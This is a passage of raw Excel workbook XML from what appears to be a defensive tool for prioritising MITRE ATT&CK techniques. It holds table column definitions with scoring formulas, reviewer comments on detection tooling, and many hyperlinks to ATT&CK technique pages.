          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
      <alignment horizontal="left" vertical="top" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>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Alexia Crumpton" id="{904307EF-B3E5-4244-915F-3902586D9F0C}" userId="S::acrumpton@mitre-engenuity.org::16d55ecf-aa02-4c5c-94f5-e0d5f455a48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231CD7-11E7-BC40-BC9C-2F6EFB148F12}" name="Table1" displayName="Table1" ref="A3:AU581" totalsRowShown="0" headerRowDxfId="48" dataDxfId="47">
  <autoFilter ref="A3:AU581" xr:uid="{16231CD7-11E7-BC40-BC9C-2F6EFB148F12}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A4:AU581">
    <sortCondition descending="1" ref="M3:M581"/>
  </sortState>
  <tableColumns count="47">
    <tableColumn id="34" xr3:uid="{FFE1ADF8-856B-2A42-A00B-6C62937F49C2}" name="Total Ransomware Top Score (Utility)" dataDxfId="46">
      <calculatedColumnFormula>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="33" xr3:uid="{4EB85A57-872B-4B26-9CF3-D67DA43E0FAD}" name="Total Top Att&amp;ck Score " dataDxfId="45">
      <calculatedColumnFormula>SUM(H4,M4,V4)*(1+SUM(AE4,AG4,AI4,AK4,AM4))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="35" xr3:uid="{89D1303A-F531-4D4F-8F8F-D17CE76ABCCB}" name="Technique (ID)" dataDxfId="44"/>
    <tableColumn id="2" xr3:uid="{74371775-0130-F446-97C3-6C50E8C2D749}" name="Technique (Name)" dataDxfId="43"/>
    <tableColumn id="3" xr3:uid="{E6421C7F-9509-2E4C-9BF4-2E284200B546}" name="Sub-technique (Name)" dataDxfId="42"/>
    <tableColumn id="32" xr3:uid="{25E54F86-DEE0-D842-8D1B-D9D045A38070}" name="Num. TID Before" dataDxfId="41"/>
    <tableColumn id="31" xr3:uid="{14D9ACC4-00F2-7547-B2D1-FC28871FB1B1}" name="Num. TID After" dataDxfId="40"/>
    <tableColumn id="30" xr3:uid="{F4AB1645-3043-504B-84A8-87D73C60DBF7}" name="Choke Point Score" dataDxfId="39">
      <calculatedColumnFormula>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="39" xr3:uid="{C283DC34-A46E-404C-BE7C-4C0F141FCBFC}" name="Before Utility (unclipped)" dataDxfId="38">
      <calculatedColumnFormula>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="38" xr3:uid="{9E2AD081-13C3-EE45-93CB-CD2BAA5DD2BB}" name="Before Utility" dataDxfId="37">
      <calculatedColumnFormula>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="37" xr3:uid="{8E7EDD2D-F81F-5347-A475-4065E509ACD0}" name="After Utility (unclipped)" dataDxfId="36">
      <calculatedColumnFormula>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="36" xr3:uid="{183D54FF-5783-8B40-A499-5EC8983FB991}" name="After Utility" dataDxfId="35">
      <calculatedColumnFormula>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="27" xr3:uid="{3716BA3F-491C-364C-BACC-313C4BAC8609}" name="Prevalence Scores" dataDxfId="34"/>
    <tableColumn id="4" xr3:uid="{AE7A9F16-BA2D-EF4B-ACB9-D99009F39605}" name="Num. CAR" dataDxfId="33"/>
    <tableColumn id="5" xr3:uid="{FD05F95D-7485-AE45-9E06-5DB3602E64E6}" name="Num. Sigma" dataDxfId="32"/>
    <tableColumn id="6" xr3:uid="{678763CB-F7D5-4741-BFA9-8DBFB70E0D89}" name="Num. ES SIEM" dataDxfId="31"/>
    <tableColumn id="7" xr3:uid="{870DF541-E181-2A48-A472-EB99B26E75E1}" name="Num. Splunk" dataDxfId="30"/>
    <tableColumn id="15" xr3:uid="{71DE9E0E-7284-40D2-823E-1340C41189E5}" name="CIS Controls" dataDxfId="29"/>
    <tableColumn id="14" xr3:uid="{9907181B-210D-4917-A218-298AC742360C}" name="Num. CIS Controls" dataDxfId="28"/>
    <tableColumn id="16" xr3:uid="{ED8FF4B2-0FA4-426D-A483-5A34565188FC}" name="NIST Controls" dataDxfId="27"/>
    <tableColumn id="8" xr3:uid="{0343C2C1-C45D-8645-A7F8-FB40112F5C95}" name="Num. 800-53 (r5)" dataDxfId="26"/>
    <tableColumn id="10" xr3:uid="{CAB14FCA-E8B8-4C00-9F33-0DB4559642C4}" name="Actionability Score" dataDxfId="25">
      <calculatedColumnFormula>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="45" xr3:uid="{CF92AE1B-0A23-1041-876D-F93227FF8F24}" name="Total Mitigations" dataDxfId="24">
      <calculatedColumnFormula>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="44" xr3:uid="{757C89C0-FCE6-2242-9DAB-68228BB380DC}" name="Mitigations Utility (unclipped)" dataDxfId="23">
      <calculatedColumnFormula>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="43" xr3:uid="{92D5B6D0-5989-AC47-A8BF-21F4067CA15C}" name="Mitigations Utility" dataDxfId="22">
      <calculatedColumnFormula>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="42" xr3:uid="{CF6693FD-5839-1243-BD89-2C9AB3FFE291}" name="Total Detections" dataDxfId="21">
      <calculatedColumnFormula>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="41" xr3:uid="{DBD0165B-2245-2244-8DF8-F2BD4D4C8894}" name="Detections Utility (unclipped)" dataDxfId="20">
      <calculatedColumnFormula>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="40" xr3:uid="{F7D7FA57-2522-DB42-AFF8-405E1E1B276A}" name="Detections Utility" dataDxfId="19">
      <calculatedColumnFormula>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="17" xr3:uid="{065848EB-5E17-43BB-8601-CD50132D61E6}" name="data sources" dataDxfId="18"/>
    <tableColumn id="19" xr3:uid="{24078B67-B6D9-46C9-B814-D855EB8A71A8}" name="Process Coverage" dataDxfId="17">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="24" xr3:uid="{6A61B421-4EAA-C846-AF5F-0AEC845F38C2}" name="Process Modifier" dataDxfId="16">
      <calculatedColumnFormula>IF(AD4="1",'TOP 10 TECHNIQUES'!C$15,0)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="20" xr3:uid="{4D532940-A715-4A08-8D8D-6E9B65B0D55E}" name="Network Coverage" dataDxfId="15">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="18" xr3:uid="{C7E4A516-E74B-C547-9FB4-02F25AED3967}" name="Network Modifier" dataDxfId="14">
      <calculatedColumnFormula>IF(AF4="1",'TOP 10 TECHNIQUES'!C$16,0)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="21" xr3:uid="{85237D7C-AE1E-464D-A4E4-0CA77D3020BC}" name="File Coverage" dataDxfId="13">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="13" xr3:uid="{A078EFA7-3462-9245-B855-5B565C0A2959}" name="File Modifier" dataDxfId="12">
      <calculatedColumnFormula>IF(AH4="1",'TOP 10 TECHNIQUES'!C$17,0)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="22" xr3:uid="{F6E76C3E-2D0B-4F84-BE18-4F28D6BAAD92}" name="Cloud Coverage" dataDxfId="11">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="11" xr3:uid="{AEDF0A33-C613-3040-B1C3-B4503E0BB5F4}" name="Cloud Modifier" dataDxfId="10">
      <calculatedColumnFormula>IF(AJ4="1",'TOP 10 TECHNIQUES'!C$18,0)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="23" xr3:uid="{BEF7F23C-B167-4B66-9114-34E12057D796}" name="Hardware Coverage" dataDxfId="9">
      <calculatedColumnFormula array="1">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC4)))))&gt;0,"1","0")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="9" xr3:uid="{A4C8D28E-261E-4940-873F-0764116FA7FE}" name="Hardware Modifier" dataDxfId="8">
      <calculatedColumnFormula>IF(AL4="1",'TOP 10 TECHNIQUES'!C$19,0)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="25" xr3:uid="{234AAD8E-8C3C-4864-97AE-AEF24856102F}" name="Ransomware (Total # of ATT&amp;CK Observations)" dataDxfId="7"/>
    <tableColumn id="1" xr3:uid="{4C10FDF2-267D-41CB-90C4-D098214F0E07}" name="Ransomware" dataDxfId="6"/>
    <tableColumn id="12" xr3:uid="{02C0A71B-5D73-41F6-8F3D-AD4789B8B46C}" name="Total Ransomware Top Score (Utility)2" dataDxfId="5">
      <calculatedColumnFormula>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="29" xr3:uid="{C0257BC7-8D5C-47CA-9E90-6BA62E9E3728}" name="TAT Utility (unclipped)" dataDxfId="4">
      <calculatedColumnFormula>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="46" xr3:uid="{95BE68C9-141A-4F5F-A9DF-E6C3696547B0}" name="TAT Utility" dataDxfId="3">
      <calculatedColumnFormula>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="47" xr3:uid="{5DC5FC8F-3666-4E87-94D3-04DC864E3CD1}" name="Count Utility (unclipped)" dataDxfId="2">
      <calculatedColumnFormula>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="48" xr3:uid="{BE7138C8-4511-4671-9BE1-8FA330A033E0}" name="Count Utility" dataDxfId="1">
      <calculatedColumnFormula>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="28" xr3:uid="{05759BF5-0105-4501-9A20-BF37443652F8}" name="Total Ransomware Top Score (Polynomial)2" dataDxfId="0">
      <calculatedColumnFormula>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 dT="2022-03-03T21:17:14.89" personId="{904307EF-B3E5-4244-915F-3902586D9F0C}" id="{C8C0DA6D-81EC-4D8E-B0EB-4EDDEC5EA839}">
    <text>Ease of Use 
Response Time 
OS Coverage (Visibility)</text>
  </threadedComment>
  <threadedComment ref="B5" dT="2022-03-03T21:37:32.52" personId="{904307EF-B3E5-4244-915F-3902586D9F0C}" id="{EB64C9E7-13DF-417D-96BB-2AB76B32F74D}">
    <text xml:space="preserve">Without the right tools or processes to aggregate and make sense of all the data, your team might not be effective yet after automating a few rules/queries. Hunters might be running queries and still get a very high amount of events that still need to be analyzed.
Tools collecting/integrating the right data (NOT JUST MORE DATA) to improve the detection of an adversary technique.
</text>
  </threadedComment>
  <threadedComment ref="B6" dT="2022-03-03T21:40:10.11" personId="{904307EF-B3E5-4244-915F-3902586D9F0C}" id="{0DBD9DCC-E22C-4CA6-B2A3-5FB64D883C65}">
    <text>Tools helping you leverage more than just simple outlier detection techniques. Here is where the capability of using advanced data science techniques are posible with the right libraries and plugins provided by your tools with access to your data (i.e Integration of Spark Analytics). (Remember, data science concepts such as machine learning might not be applicable to every single use case or technique that you are trying to detect). If you can validate the detection of an adversay technique by just applying basic data science techniques, then you might be already in the "Very Good" level.</text>
  </threadedComment>
</ThreadedComment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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/002" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/002" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/001" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/003" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1482" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/004" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/009" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/002" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/001" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/002" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/003" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/002" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/001" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/007" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/003" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/003" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074/001" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1125" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/004" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/002" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/006" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/003" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/006" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/004" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/005" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1133" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/011" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/009" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/005" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/002" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1030" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1201" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/002" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/001" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/002" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597/002" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/001" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/006" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/004" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/001" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/001" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1571" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/001" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1025" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/009" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1480" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/002" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1594" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1200" TargetMode="External"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/006" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/004" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/015" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/001" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/001" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205/001" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1220" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586/002" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/001" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1006" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/002" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/001" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/002" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/002" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/002" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/001" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/002" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/003" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/001" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/011" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1599" TargetMode="External"/><Relationship Id="rId490" 